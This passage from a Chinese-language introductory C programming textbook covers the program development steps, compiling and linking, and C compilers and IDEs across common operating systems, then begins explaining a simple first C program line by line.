除此之外,还要决定在程序(还可能是辅助文件)中如何表示数据,以 及用什么方法处理数据。学习C语言之初,遇到的问题都很简单,没什么可 选的。但是,随着要处理的情况越来越复杂,需要决策和考虑的方面也越来 越多。通常,选择一个合适的方式表示信息可以更容易地设计程序和处理数 据。 再次强调,应该用一般术语来描述问题,而不是用具体的代码。但是, 你的某些决策可能取决于语言的特性。例如,在数据表示方面,C的程序员 就比Pascal的程序员有更多选择。 1.7.3 第3步:编写代码 设计好程序后,就可以编写代码来实现它。也就是说,把你设计的程序 翻译成 C语言。这里是真正需要使用C语言的地方。可以把思路写在纸上, 但是最终还是要把代码输入计算机。这个过程的机制取决于编程环境,我们 稍后会详细介绍一些常见的环境。一般而言,使用文本编辑器创建源代码文 件。该文件中内容就是你翻译的C语言代码。程序清单1.1是一个C源代码的 示例。 程序清单1.1 C源代码示例 #include <stdio.h> 43 int main(void) { int dogs; printf("How many dogs do you have?\n"); scanf("%d", &dogs); printf("So you have %d dog(s)!\n", dogs); return 0; } 在这一步骤中,应该给自己编写的程序添加文字注释。最简单的方式是 使用 C的注释工具在源代码中加入对代码的解释。第2章将详细介绍如何在 代码中添加注释。 1.7.4 第4步:编译 接下来的这一步是编译源代码。再次提醒读者注意,编译的细节取决于 编程的环境,我们稍后马上介绍一些常见的编程环境。现在,先从概念的角 度讲解编译发生了什么事情。 前面介绍过,编译器是把源代码转换成可执行代码的程序。可执行代码 是用计算机的机器语言表示的代码。这种语言由数字码表示的指令组成。如 前所述,不同的计算机使用不同的机器语言方案。C 编译器负责把C代码翻 译成特定的机器语言。此外,C编译器还将源代码与C库(库中包含大量的 标准函数供用户使用,如printf()和scanf())的代码合并成最终的程序(更精 确地说,应该是由一个被称为链接器的程序来链接库函数,但是在大多数系 统中,编译器运行链接器)。其结果是,生成一个用户可以运行的可执行文 件,其中包含着计算机能理解的代码。 44 编译器还会检查C语言程序是否有效。如果C编译器发现错误,就不生 成可执行文件并报错。理解特定编译器报告的错误或警告信息是程序员要掌 握的另一项技能。 1.7.5 第5步:运行程序 传统上,可执行文件是可运行的程序。在常见环境(包括Windows命令 提示符模式、UNIX终端模式和Linux终端模式)中运行程序要输入可执行文 件的文件名,而其他环境可能要运行命令(如,在VAX中的VMS[2])或一 些其他机制。例如,在Windows和Macintosh提供的集成开发环境(IDE) 中,用户可以在IDE中通过选择菜单中的选项或按下特殊键来编辑和执行C 程序。最终生成的程序可通过单击或双击文件名或图标直接在操作系统中运 行。 1.7.6 第6步:测试和调试程序 程序能运行是个好迹象,但有时也可能会出现运行错误。接下来,应该 检查程序是否按照你所设计的思路运行。你会发现你的程序中有一些错误, 计算机行话叫作bug。查找并修复程序错误的过程叫调试。学习的过程中不 可避免会犯错,学习编程也是如此。因此,当你把所学的知识应用于编程 时,最好为自己会犯错做好心理准备。随着你越来越老练,你所写的程序中 的错误也会越来越不易察觉。 将来犯错的机会很多。你可能会犯基本的设计错误,可能错误地实现了 一个好想法,可能忽视了输入检查导致程序瘫痪,可能会把圆括号放错地 方,可能误用 C语言或打错字,等等。把你将来犯错的地方列出来,这份错 误列表应该会很长。 看到这里你可能会有些绝望,但是情况没那么糟。现在的编译器会捕获 许多错误,而且自己也可以找到编译器未发现的错误。在学习本书的过程 中,我们会给读者提供一些调试的建议。 1.7.7 第7步:维护和修改代码 45 创建完程序后,你发现程序有错,或者想扩展程序的用途,这时就要修 改程序。例如,用户输入以Zz开头的姓名时程序出现错误、你想到了一个更 好的解决方案、想添加一个更好的新特性,或者要修改程序使其能在不同的 计算机系统中运行,等等。如果在编写程序时清楚地做了注释并采用了合理 的设计方案,这些事情都很简单。 1.7.8 说明 编程并非像描述那样是一个线性的过程。有时,要在不同的步骤之间往 复。例如,在写代码时发现之前的设计不切实际,或者想到了一个更好的解 决方案,或者等程序运行后,想改变原来的设计思路。对程序做文字注释为 今后的修改提供了方便。 许多初学者经常忽略第1步和第2步(定义程序目标和设计程序),直接 跳到第3步(编写代码)。刚开始学习时,编写的程序非常简单,完全可以 在脑中构思好整个过程。即使写错了,也很容易发现。但是,随着编写的程 序越来越庞大、越来越复杂,动脑不动手可不行,而且程序中隐藏的错误也 越来越难找。最终,那些跳过前两个步骤的人往往浪费了更多的时间,因为 他们写出的程序难看、缺乏条理、让人难以理解。要编写的程序越大越复 杂,事先定义和设计程序环节的工作量就越大。 磨刀不误砍柴工,应该养成先规划再动手编写代码的好习惯,用纸和笔 记录下程序的目标和设计框架。这样在编写代码的过程中会更加得心应手、 条理清晰。 46 1.8 编程机制 生成程序的具体过程因计算机环境而异。C是可移植性语言,因此可以 在许多环境中使用,包括UNIX、Linux、MS-DOS(一些人仍在使用)、 Windows和Macintosh OS。有些产品会随着时间的推移发生演变或被取代, 本书无法涵盖所有环境。 首先,来看看许多C环境(包括上面提到的5种环境)共有的一些方 面。虽然不必详细了解计算机内部如何运行C程序,但是,了解一下编程机 制不仅能丰富编程相关的背景知识,还有助于理解为何要经过一些特殊的步 骤才能得到C程序。 用C语言编写程序时,编写的内容被储存在文本文件中,该文件被称为 源代码文件(source code file)。大部分C系统,包括之前提到的,都要求文 件名以.c结尾(如,wordcount.c和budget.c)。在文件名中,点号(.)前面 的部分称为基本名(basename),点号后面的部分称为扩展名 (extension)。因此,budget是基本名,c是扩展名。基本名与扩展名的组合 (budget.c)就是文件名。文件名应该满足特定计算机操作系统的特殊要 求。例如,MS-DOS是IBM PC及其兼容机的操作系统,比较老旧,它要求基 本名不能超过8个字符。因此,刚才提到的文件名wordcount.c就是无效的 DOS文件名。有些UNIX系统限制整个文件名(包括扩展名)不超过14个字 符,而有些UNIX系统则允许使用更长的文件名,最多255个字符。Linux、 Windows和Macintosh OS都允许使用长文件名。 接下来,我们来看一下具体的应用,假设有一个名为concrete.c的源文 件,其中的C源代码如程序清单1.2所示。 程序清单1.2 c程序 #include <stdio.h> int main(void) 47 { printf("Concrete contains gravel and cement.\n"); return 0; } 如果看不懂程序清单1.2中的代码,不用担心,我们将在第2章学习相关 知识。 1.8.1 目标代码文件、可执行文件和库 C编程的基本策略是,用程序把源代码文件转换为可执行文件(其中包 含可直接运行的机器语言代码)。典型的C实现通过编译和链接两个步骤来 完成这一过程。编译器把源代码转换成中间代码,链接器把中间代码和其他 代码合并,生成可执行文件。C 使用这种分而治之的方法方便对程序进行模 块化,可以独立编译单独的模块,稍后再用链接器合并已编译的模块。通过 这种方式,如果只更改某个模块,不必因此重新编译其他模块。另外,链接 器还将你编写的程序和预编译的库代码合并。 中间文件有多种形式。我们在这里描述的是最普遍的一种形式,即把源 代码转换为机器语言代码,并把结果放在目标代码文件(或简称目标文件) 中(这里假设源代码只有一个文件)。虽然目标文件中包含机器语言代码, 
但是并不能直接运行该文件。因为目标文件中储存的是编译器翻译的源代 码,这还不是一个完整的程序。 目标代码文件缺失启动代码(startup code)。启动代码充当着程序和操 作系统之间的接口。例如,可以在MS Windows或Linux系统下运行IBM PC兼 容机。这两种情况所使用的硬件相同,所以目标代码相同,但是Windows和 Linux所需的启动代码不同,因为这些系统处理程序的方式不同。 目标代码还缺少库函数。几乎所有的C程序都要使用C标准库中的函 数。例如,concrete.c中就使用了 printf()函数。目标代码文件并不包含该函 48 数的代码,它只包含了使用 printf()函数的指令。printf()函数真正的代码储存 在另一个被称为库的文件中。库文件中有许多函数的目标代码。 链接器的作用是,把你编写的目标代码、系统的标准启动代码和库代码 这 3 部分合并成一个文件,即可执行文件。对于库代码,链接器只会把程序 中要用到的库函数代码提取出来(见图1.4)。 图1.4 编译器和链接器 简而言之,目标文件和可执行文件都由机器语言指令组成的。然而,目 标文件中只包含编译器为你编写的代码翻译的机器语言代码,可执行文件中 还包含你编写的程序中使用的库函数和启动代码的机器代码。 49 在有些系统中,必须分别运行编译程序和链接程序,而在另一些系统 中,编译器会自动启动链接器,用户只需给出编译命令即可。 接下来,了解一些具体的系统。 1.8.2 UNIX系统 由于C语言因UNIX系统而生,也因此而流行,所以我们从UNIX系统开 始(注意:我们提到的UNIX还包含其他系统,如FreeBSD,它是UNIX的一 个分支,但是由于法律原因不使用该名称)。 1.在UNIX系统上编辑 UNIX C没有自己的编辑器,但是可以使用通用的UNIX编辑器,如 emacs、jove、vi或X Window System文本编辑器。 作为程序员,要负责输入正确的程序和为储存该程序的文件起一个合适 的文件名。如前所述,文件名应该以.c结尾。注意,UNIX区分大小写。因 此,budget.c、BUDGET.c和Budget.c是3个不同但都有效的C源文件名。但是 BUDGET.C是无效文件名,因为该名称的扩展名使用了大写C而不是小写c。 假设我们在vi编译器中编写了下面的程序,并将其储存在inform.c文件 中: #include <stdio.h> int main(void) { printf("A .c is used to end a C program filename.\n"); return 0; } 50 以上文本就是源代码,inform.c是源文件。注意,源文件是整个编译过 程的开始,不是结束。 2.在UNIX系统上编译 虽然在我们看来,程序完美无缺,但是对计算机而言,这是一堆乱码。 计算机不明白#include 和printf是什么(也许你现在也不明白,但是学到后面 就会明白,而计算机却不会)。如前所述,我们需要编译器将我们编写的代 码(源代码)翻译成计算机能看懂的代码(机器代码)。最后生成的可执行 文件中包含计算机要完成任务所需的所有机器代码。 以前,UNIX C编译器要调用语言定义的cc命令。但是,它没有跟上标 准发展的脚步,已经退出了历史舞台。但是,UNIX系统提供的C编译器通常 来自一些其他源,然后以cc命令作为编译器的别名。因此,虽然在不同的系 统中会调用不同的编译器,但用户仍可以继续使用相同的命令。 编译inform.c,要输入以下命令: cc inform.c 几秒钟后,会返回 UNIX 的提示,告诉用户任务已完成。如果程序编写 错误,你可能会看到警告或错误消息,但我们先假设编写的程序完全正确 (如果编译器报告void的错误,说明你的系统未更新成ANSI C编译器,只需 删除void即可)。如果使用ls命令列出文件,会发现有一个a.out文件(见图 1.5)。该文件是包含已翻译(或已编译)程序的可执行文件。要运行该文 件,只需输入: a.out 输出内容如下: A .c is used to end a C program filename. 51 图1.5 用UNIX准备C程序 如果要储存可执行文件(a.out),应该把它重命名。否则,该文件会被 下一次编译程序时生成的新a.out文件替换。 如何处理目标代码?C 编译器会创建一个与源代码基本名相同的目标代 码文件,但是其扩展名是.o。在该例中,目标代码文件是 inform.o。然而, 却找不到这个文件,因为一旦链接器生成了完整的可执行程序,就会将其删 除。如果原始程序有多个源代码文件,则保留目标代码文件。学到后面多文 52 件程序时,你会明白到这样做的好处。 1.8.3 GNU编译器集合和LLVM项目 GNU项目始于1987年,是一个开发大量免费UNIX软件的集合(GNU的 意思是“GNU’s Not UNIX”,即GNU不是UNIX)。GNU编译器集合(也被称 为GCC,其中包含GCC C编译器)是该项目的产品之一。GCC在一个指导委 员会的带领下,持续不断地开发,它的C编译器紧跟C标准的改动。GCC有 各种版本以适应不同的硬件平台和操作系统,包括UNIX、Linux和 Windows。用gcc命令便可调用GCC C编译器。许多使用gcc的系统都用cc作 为gcc的别名。 LLVM项目成为cc的另一个替代品。该项目是与编译器相关的开源软件 集合,始于伊利诺伊大学的2000份研究项目。它的 Clang编译器处理 C代 码,可以通过 clang调用。有多种版本供不同的平台使用,包括Linux。2012 年,Clang成为FreeBSD的默认C编译器。Clang也对最新的C标准支持得很 好。 GNU和LLVM都可以使用-v选项来显示版本信息,因此各系统都使用cc 别名来代替gcc或clang命令。以下组合: cc -v 显示你所使用的编译器及其版本。 gcc和clang命令都可以根据不同的版本选择运行时选项来调用不同C标 准。 gcc -std=c99 inform.c[3] gcc -std=c1x inform.c gcc -std=c11 inform.c 53 第1行调用C99标准,第2行调用GCC接受C11之前的草案标准,第3行调 用GCC接受的C11标准版本。Clang编译器在这一点上用法与GCC相同。 1.8.4 Linux系统 Linux是一个开源、流行、类似于UNIX的操作系统,可在不同平台(包 括PC和Mac)上运行。在Linux中准备C程序与在UNIX系统中几乎一样,不 同的是要使用GNU提供的GCC公共域C编译器。编译命令类似于: gcc inform.c 注意,在安装Linux时,可选择是否安装GCC。如果之前没有安装 GCC,则必须安装。通常,安装过程会将cc作为gcc的别名,因此可以在命 令行中使用cc来代替gcc。 欲详细了解GCC和最新发布的版本,请访问 http://www.gnu.org/software/gcc/index.html。 1.8.5 PC的命令行编译器 C编译器不是标准Windows软件包的一部分,因此需要从别处获取并安 装C编译器。可以从互联网免费下载Cygwin和MinGW,这样便可在PC上通 过命令行使用GCC编译器。Cygwin在自己的视窗运行,模仿Linux命令行环 境,有一行命令提示。MinGW在Windows的命令提示模式中运行。这和GCC 的最新版本一样,支持C99和C11最新的一些功能。Borland的C++编译器5.5 也可以免费下载,支持C90。 源代码文件应该是文本文件,不是字处理器文件(字处理器文件包含许 多额外的信息,如字体和格式等)。因此,要使用文本编辑器(如, Windows Notepad)来编辑源代码。如果使用字处理器,要以文本模式另存 文件。源代码文件的扩展名应该是.c。一些字处理器会为文本文件自动添 加.txt 扩展名。如果出现这种情况,要更改文件名,把txt替换成c。 通常,C编译器生成的中间目标代码文件的扩展名是.obj(也可能是其 54 他扩展名)。与UNIX编译器不同,这些编译器在完成编译后通常不会删除 这些中间文件。有些编译器生成带.asm扩展名的汇编语言文件,而有些编译 器则使用自己特有的格式。 一些编译器在编译后会自动运行链接器,另一些要求用户手动运行链接 
器。在可执行文件中链接的结果是,在原始的源代码基本名后面加上.exe扩 展名。例如,编译和链接concrete.c源代码文件,生成的是concrete.exe文件。 可以在命令行输入基本名来运行该程序: C>concrete 1.8.6 集成开发环境(Windows) 许多供应商(包括微软、Embarcadero、Digital Mars)都提供Windows 下的集成开发环境,或称为IDE(目前,大多数IDE都是C和C++结合的编译 器)。可以免费下载的IDE有Microsoft Visual Studio Express和Pelles C。利用 集成开发环境可以快速开发C程序。关键是,这些IDE都内置了用于编写C程 序的编辑器。这类集成开发环境都提供了各种菜单(如,命名、保存源代码 文件、编译程序、运行程序等),用户不用离开IDE就能顺利编写、编译和 运行程序。如果编译器发现错误,会返回编辑器中,标出有错误的行号,并 简单描述情况。 初次接触Windows IDE可能会望而生畏,因为它提供了多种目标 (target),即运行程序的多种环境。例如,IDE提供了32位Windows程序、 64位Windows程序、动态链接库文件(DLL)等。许多目标都涉及Windows 图形界面。要管理这些(及其他)选择,通常要先创建一个项目 (project),以便稍后在其中添加待使用的源代码文件名。不同的产品具体 步骤不同。一般而言,首先使用【文件】菜单或【项目】菜单创建一个项 目。选择正确的项目形式非常重要。本书中的例子都是一般示例,针对在简 单的命令行环境中运行而设计。Windows IDE提供多种选择以满足用户的不 同需求。例如,Microsoft Visual Studio提供【Win32控制台应用程序】选 项。对于其他系统,查找一个诸如【DOS EXE】、【Console】或 55 【Character Mode】的可执行选项。选择这些模式后,将在一个类控制台窗 口中运行可执行程序。选择好正确的项目类型后,使用IDE的菜单打开一个 新的源代码文件。对于大多数产品而言,使用【文件】菜单就能完成。你可 能需要其他步骤将源文件添加到项目中。 通常,Windows IDE既可处理C也可处理C++,因此要指定待处理的程序 是C还是C++。有些产品用项目类型来区分两者,有些产品(如,Microsoft Visual C++)用.c文件扩展名来指明使用C而不是C++。当然,大多数C程序 也可以作为C++程序运行。欲了解C和C++的区别,请参阅参考资料IX。 你可能会遇到一个问题:在程序执行完毕后,执行程序的窗口立即消 失。如果不希望出现这种情况,可以让程序暂停,直到按下Enter键,窗口 才消失。要实现这种效果,可以在程序的最后(return这行代码之前)添加 下面一行代码: getchar(); 该行读取一次键的按下,所以程序在用户按下Enter键之前会暂停。有 时根据程序的需要,可能还需要一个击键等待。这种情况下,必须用两次 getchar(): getchar(); getchar(); 例如,程序在最后提示用户输入体重。用户键入体重后,按下Enter键 以输入数据。程序将读取体重,第1个getchar()读取Enter键,第2个getchar() 会导致程序暂停,直至用户再次按下Enter键。如果你现在不知所云,没关 系,在学完C输出后就会明白。到时,我们会提醒读者使用这种方法。 虽然许多IDE在使用上大体一致,但是细节上有所不同。就一个产品的 系列而言,不同版本也是如此。要经过一段时间的实践,才会熟悉编译器的 工作方式。必要时,还需阅读使用手册或网上教程。 56 Microsoft Visual Studio和C标准 在Windows软件开发中,Microsoft Visual Studio及其免费版本Microsoft Visual Studio Express都久负盛名,它们与C标准的关系也很重要。然而,微 软鼓励程序员从C转向C++和C#。虽然Visual Studio支持C89/90,但是到目前 为止,它只选择性地支持那些在C++新特性中能找到的C标准(如,long long类型)。而且,自2012版本起,Visual Studio不再把C作为项目类型的选 项。尽管如此,本书中的绝大多数程序仍可用Visual Studio来编译。在新建 项目时,选择C++选项,然后选择【Win32控制台应用程序】,在应用设置 中选择【空项目】。几乎所有的C程序都能与C++程序兼容。所以,本书中 的绝大多数C程序都可作为C++程序运行。或者,在选择C++选项后,将默 认的源文件扩展名.cpp替换成.c,编译器便会使用C语言的规则代替C++。 1.8.7 Windows/Linux 许多Linux发行版都可以安装在Windows系统中,以创建双系统。一些存 储器会为Linux系统预留空间,以便可以启动Windows或Linux。可以在 Windows系统中运行Linux程序,或在Linux系统中运行Windows程序。不能通 过Windows系统访问Linux文件,但是可以通过Linux系统访问Windows文档。 1.8.8 Macintosh中的C 目前,苹果免费提供Xcode开发系统下载(过去,它有时免费,有时付 费)。它允许用户选择不同的编程语言,包括C语言。 Xcode 凭借可处理多种编程语言的能力,可用于多平台,开发超大型的 项目。但是,首先要学会如何编写简单的C程序。在Xcode 4.6中,通过 【File】菜单选择【New Project】,然后选择【OS X Application Command Line Tool】,接着输入产品名并选择C类型。Xcode使用Clang或GCC C编译 器来编译C代码,它以前默认使用GCC,但是现在默认使用Clang。可以设置 选择使用哪一个编译器和哪一套C标准(因为许可方面的事宜,Xcode中 Clang的版本比GCC的版本要新)。 57 UNIX系统内置Mac OS X,终端工具打开的窗口是让用户在UNIX命令行 环境中运行程序。苹果在标准软件包中不提供命令行编译器,但是,如果下 载了 Xcode,还可以下载可选的命令行工具,这样就可以使用clang和gcc命 令在命令行模式中编译。 58 1.9 本书的组织结构 本书采用多种方式编排内容,其中最直接的方法是介绍A主题的所有内 容、介绍B主题的所有内容,等等。这对参考类书籍来说尤为重要,读者可 以在同一处找到与主题相关的所有内容。但是,这通常不是学习的最佳顺 序。例如,如果在开始学习英语时,先学完所有的名词,那你的表达能力一 定很有限。虽然可以指着物品说出名称,但是,如果稍微学习一些名词、动 词、形容词等,再学习一些造句规则,那么你的表达能力一定会大幅提高。 为了让读者更好地吸收知识,本书采用螺旋式方法,先在前几个章节中 介绍一些主题,在后面章节再详细讨论相关内容。例如,对学习C语言而 言,理解函数至关重要。因此,我们在前几个章节中安排一些与函数相关的 内容,等读者学到第 9 章时,已对函数有所了解,学习使用函数会更加容 易。与此类似,前几章还概述了一些字符串和循环的内容。这样,读者在完 全弄懂这些内容之前,就可以在自己的程序中使用这些有用的工具。 59 1.10 本书的约定 在学习C语言之前,先介绍一下本书的格式。 1.10.1 字体 本书用类似在屏幕上或打印输出时的字体(一种等宽字体),表示文本 程序和计算机输入、输出。前面已经出现了多次,如果读者没有注意到,字 体如下所示: #include <stdio.h> int main(void) { printf("Concrete contains gravel and cement.\n"); return 0; } 在涉及与代码相关的术语时,也使用相同的等宽字体,如stdio.h。本书 用等宽斜体表示占位符,可以用具体的项替换这些占位符。例如,下面是一 个声明的模型: type_name variable_name; 这里,可用int替换type_name,用zebra_count替换variable_name。 1.10.2 程序输出 本书用相同的字体表示计算机的输出,粗体表示用户输入。例如,下面 是第14章中一个程序的输出: 60 Please enter the book title. 
Press [enter] at the start of a line to stop. My Life as a Budgie Now enter the author. Mack Zackles 如上所示,以标准计算机字体显示的行表示程序的输出,粗体行表示用 户的输入。 可以通过多种方式与计算机交互。在这里,我们假设读者使用键盘键入 内容,在屏幕上阅读计算机的响应。 1.特殊的击键 通常,通过按下标有 Enter、c/r、Return 或一些其他文字的键来发送指 令。本书将这些按键统一称为Enter键。一般情况下,我们默认你在每行输 入的末尾都会按下Enter键。尽管如此,为了标示一些特定的位置,本书使 用[enter]显式标出Enter键。方括号表示按下一次Enter键,而不是输入enter。 除此之外,书中还会提到控制字符(如,Ctrl+D)。这种写法的意思 是,在按下Ctrl键(也可能是Control键)的同时按下D键。 2.本书使用的系统 C 语言的某些方面(如,储存数字的空间大小)因系统而异。本书在示 例中提到“我们的系统”时,通常是指在iMac上运行OS X 10.8.4,使用Xcode 4.6.2开发系统的Clang 3.2编译器。本书的大部分程序都能使用Windows7系 统的Microsoft Visual Studio Express 2012和Pelles C 7.0,以及Ubuntu13.04 Linux系统的GCC 4.7.3进行编译。 3.读者的系统 61 你需要一个C编译器或访问一个C编译器。C程序可以在多种计算机系统 中运行,因此你的选择面很广。确保你使用的C编译器与当前使用的计算机 系统匹配。本书中,除了某些示例要求编译器支持C99或C11标准,其余大 部分示例都可在C90编译器中运行。如果你使用的编译器是早于ANSI/ISO的 老式编译器,在编译时肯定要经常调整,很不方便。与其如此,不如换个新 的编译器。 大部分编译器供应商都为学生和教学人员提供特惠版本,详情请查看供 应商的网站。 1.10.3 特殊元素 本书包含一些强调特定知识点的特殊元素,提示、注意、警告,将以如 下形式出现在本书中: 边栏 边栏提供更深入的讨论或额外的背景,有助于解释当前的主题。 提示 提示一般都短小精悍,帮助读者理解一些特殊的编程情况。 警告 用于警告读者注意一些潜在的陷阱。 注意 提供一些评论,提醒读者不要误入歧途。 62 1.11 本章小结 C是强大而简洁的编程语言。它之所以流行,在于自身提供大量的实用 编程工具,能很好地控制硬件。而且,与大多数其他程序相比,C程序更容 易从一个系统移植到另一个系统。 C是编译型语言。C编译器和链接器是把C语言源代码转换成可执行代码 的程序。 用C语言编程可能费力、困难,让你感到沮丧,但是它也可以激发你的 兴趣,让你兴奋、满意。我们希望你在愉快的学习过程中爱上C。 63 1.12 复习题 复习题的参考答案在附录A中。 1.对编程而言,可移植性意味着什么? 2.解释源代码文件、目标代码文件和可执行文件有什么区别? 3.编程的7个主要步骤是什么? 4.编译器的任务是什么? 5.链接器的任务是什么? 64 1.13 编程练习 我们尚未要求你编写C代码,该练习侧重于编程过程的早期步骤。 1.你刚被MacroMuscle有限公司聘用。该公司准备进入欧洲市场,需要 一个把英寸单位转换为厘米单位(1 英寸=2.54 厘米)的程序。该程序要提 示用户输入英寸值。你的任务是定义程序目标和设计程序(编程过程的第1 步和第2步)。 [1].国际C语言混乱代码大赛(IOCCC,The International Obfuscated C Code Contest)。这是一项国际编程赛事,从1984年开始,每年举办一次(1997、 1999、2002、2003和2006年除外),目的是写出最有创意且最让人难以理解 的C语言代码。——译者注 [2].VAX(Virtual Address eXtension)是一种可支持机器语言和虚拟地址的32 位小型计算机。VMS(Virtual Memory System)是旧名,现在叫OpenVMS, 是一种用于服务器的操作系统,可在VAX、Alpha或Itanium处理器系列平台 上运行。——译者注 [3].GCC最基本的用法是:gcc [options] [filenames],其中options是所需的参 数,filenames是文件名。——译者注 65 第2章 C语言概述 本章介绍以下内容: 运算符:= 函数:main()、printf() 编写一个简单的C程序 创建整型变量,为其赋值并在屏幕上显示其值 换行字符 如何在程序中写注释,创建包含多个函数的程序,发现程序的错误 什么是关键字 C程序是什么样子的?浏览本书,能看到许多示例。初见 C 程序会觉得 有些古怪,程序中有许多{、cp->tort和*ptr++这样的符号。然而,在学习C 的过程中,对这些符号和C语言特有的其他符号会越来越熟悉,甚至会喜欢 上它们。如果熟悉与C相关的其他语言,会对C语言有似曾相识的感觉。本 章,我们从演示一个简单的程序示例开始,解释该程序的功能。同时,强调 一些C语言的基本特性。 66 2.1 简单的C程序示例 我们来看一个简单的C程序,如程序清单2.1所示。该程序演示了用C语 言编程的一些基本特性。请先通读程序清单2.1,看看自己是否能明白该程 序的用途,再认真阅读后面的解释。 程序清单2.1 first.c程序 #include <stdio.h> int main(void)         /* 一个简单的C程序 */ { int num;          /* 定义一个名为num的变量 */ num = 1;          /* 为num赋一个值 */ printf("I am a simple "); /* 使用printf()函数 */ printf("computer.\n"); printf("My favorite number is %d because it is first.\n",num); return 0; } 如果你认为该程序会在屏幕上打印一些内容,那就对了!光看程序也许 并不知道打印的具体内容,所以,运行该程序,并查看结果。首先,用你熟 悉的编辑器(或者编译器提供的编辑器)创建一个包含程序清单2.1 中所有 内容的文件。给该文件命名,并以.c作为扩展名,以满足当前系统对文件名 的要求。例如,可以使用first.c。现在,编译并运行该程序(查看第1章,复 习该步骤的具体内容)。如果一切运行正常,该程序的输出应该是: 67 I am a simple computer. My favorite number is 1 because it is first. 
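顺带一提,读者可以立即动手做个小试验:把程序中赋给 num 的值改成其他整数,再重新编译并运行,观察输出如何变化。下面是一个改动后的版本,仅作练习示意,其中的数值 7 和提示语都是随意选定的:

#include <stdio.h>
int main(void)         /* 改动后的简单C程序 */
{
    int num;           /* 定义一个名为num的变量 */

    num = 7;           /* 这次把7赋给num */
    printf("I am a simple ");
    printf("computer.\n");
    printf("My favorite number is %d because it is lucky.\n", num);
    return 0;
}

此时最后一行输出会相应变成 My favorite number is 7 because it is lucky.,其余两行不变。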
总而言之,结果在意料之中,但是程序中的\n 和%d 是什么?程序中有 几行代码看起来有点奇怪。接下来,我们逐行解释这个程序。 程序调整 程序的输出是否在屏幕上一闪而过?某些窗口环境会在单独的窗口运行 程序,然后在程序运行结束后自动关闭窗口。如果遇到这种情况,可以在程 序中添加额外的代码,让窗口等待用户按下一个键后才关闭。一种方法是, 在程序的return语句前添加一行代码: getchar(); 这行代码会让程序等待击键,窗口会在用户按下一个键后才关闭。在第 8 章中会详细介绍 getchar()的内容。 68 2.2 示例解释 我们会把程序清单2.1的程序分析两遍。第1遍(快速概要)概述程序中 每行代码的作用,帮助读者初步了解程序。第2遍(程序细节)详细分析代 码的具体含义,帮助读者深入理解程序。 图2.1总结了组成C程序的几个部分[1],图中包含的元素比第1个程序 多。 图2.1 C程序解剖 69 2.2.1 第1遍:快速概要 本节简述程序中的每行代码的作用。下一节详细讨论代码的含义。 #include<stdio.h>   ←包含另一个文件 该行告诉编译器把stdio.h中的内容包含在当前程序中。stdio.h是C编译器 软件包的标准部分,它提供键盘输入和屏幕输出的支持。 int main(void)     ←函数名 C程序包含一个或多个函数,它们是C程序的基本模块。程序清单2.1的 程序中有一个名为main()的函数。圆括号表明main()是一个函数名。int表明 main()函数返回一个整数,void表明main()不带任何参数。这些内容我们稍后 详述。现在,只需记住int和void是标准ANSI C定义main()的一部分(如果使 用ANSI C之前的编译器,请省略void;考虑到兼容的问题,请尽量使用较新 的C编译器)。 /* 一个简单的C程序 */    ←注释 注释在/*和*/两个符号之间,这些注释能提高程序的可读性。注意,注 释只是为了帮助读者理解程序,编译器会忽略它们。 {    ←函数体开始 左花括号表示函数定义开始,右花括号(})表示函数定义结束。 int num;   ←声明 该声明表明,将使用一个名为num的变量,而且num是int(整数)类 型。 num = 1;   ←赋值表达式语句 语句num = 1;把值1赋给名为num的变量。 70 printf("I am a simple "); ←调用一个函数 该语句使用 printf()函数,在屏幕上显示 I am a simple,光标停在同一 行。printf()是标准的C库函数。在程序中使用函数叫作调用函数。 printf("computer.\n");   ←调用另一个函数 接下来调用的这个printf()函数在上条语句打印出来的内容后面加 上“computer”。代码\n告诉计算机另起一行,即把光标移至下一行。 printf("My favorite number is %d because it is first.\n", num); 最后调用的printf()把num的值(1)内嵌在用双引号括起来的内容中一并 打印。%d告诉计算机以何种形式输出num的值,打印在何处。 return 0;   ←return语句 C函数可以给调用方提供(或返回)一个数。目前,可暂时把该行看作 是结束main()函数的要求。 }    ←结束 必须以右花括号表示程序结束。 2.2.2 第2遍:程序细节 浏览完程序清单2.1后,我们来仔细分析这个程序。再次强调,本节将 逐行分析程序中的代码,以每行代码为出发点,深入分析代码背后的细节, 为更全面地学习C语言编程的特性夯实基础。 1.#include指令和头文件 #include<stdio.h> 这是程序的第1行。#include <stdio.h>的作用相当于把stdio.h文件中的所 有内容都输入该行所在的位置。实际上,这是一种“拷贝-粘贴”的操作。 71 include 文件提供了一种方便的途径共享许多程序共有的信息。 #include这行代码是一条C预处理器指令(preprocessor directive)。通 常,C编译器在编译前会对源代码做一些准备工作,即预处理 (preprocessing)。 所有的C编译器软件包都提供stdio.h文件。该文件中包含了供编译器使 用的输入和输出函数(如, printf())信息。该文件名的含义是标准输入/输 出头文件。通常,在C程序顶部的信息集合被称为头文件(header)。 在大多数情况下,头文件包含了编译器创建最终可执行程序要用到的信 息。例如,头文件中可以定义一些常量,或者指明函数名以及如何使用它 们。但是,函数的实际代码在一个预编译代码的库文件中。简而言之,头文 件帮助编译器把你的程序正确地组合在一起。 ANSI/ISO C规定了C编译器必须提供哪些头文件。有些程序要包含 stdio.h,而有些不用。特定C实现的文档中应该包含对C库函数的说明。这些 说明确定了使用哪些函数需要包含哪些头文件。例如,要使用printf()函数, 必须包含stdio.h头文件。省略必要的头文件可能不会影响某一特定程序,但 是最好不要这样做。本书每次用到库函数,都会用#include指令包含 ANSI/ISO标准指定的头文件。 注意 为何不内置输入和输出 读者一定很好奇,为何不把输入和输出这些基本功能内置在语言中。原 因之一是,并非所有的程序都会用到I/O(输入/输出)包。轻装上阵表现了 C语言的哲学。正是这种经济使用资源的原则,使得C语言成为流行的嵌入 式编程语言(例如,编写控制汽车自动燃油系统或蓝光播放机芯片的代 码)。#include中的#符号表明,C预处理器在编译器接手之前处理这条指 令。本书后面章节中会介绍更多预处理器指令的示例,第16章将更详细地讨 论相关内容。 2.main()函数 72 int main(void); 程序清单2.1中的第2行表明该函数名为main。的确,main是一个极其普 通的名称,但是这是唯一的选择。C程序一定从main()函数开始执行(目前 不必考虑例外的情况)。除了main()函数,你可以任意命名其他函数,而且 main()函数必须是开始的函数。圆括号有什么功能?用于识别main()是一个 函数。很快你将学到更多的函数。就目前而言,只需记住函数是C程序的基 本模块。 int是main()函数的返回类型。这表明main()函数返回的值是整数。返回 到哪里?返回给操作系统。我们将在第6章中再来探讨这个问题。 通常,函数名后面的圆括号中包含一些传入函数的信息。该例中没有传 递任何信息。因此,圆括号内是单词void(第11章将介绍把信息从main()函 